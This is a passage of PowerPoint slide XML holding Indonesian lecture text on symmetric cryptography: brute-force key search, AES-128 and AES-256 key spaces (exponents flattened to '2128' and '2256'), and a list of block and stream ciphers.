            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>hasilnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>omong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kosong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> bit yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> pseudorandom. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> Advanced Encryption Standard (AES). Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>. AES-128 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> 128-bit. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> (0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> 1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dikalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dirinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> kali yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>setara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> 2128, di mana 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> basis dan 128 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>eksponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>. AES-256 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sebesar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> 2256. Ruang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> dua kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> AES-128; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>triliunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>tahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> brute force.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Kekurangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>prosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>DES, 3DES, AES, Blowfish, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Twofish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, IDEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (block cipher)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>RC4, ChaCha20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (stream cipher)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dipakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
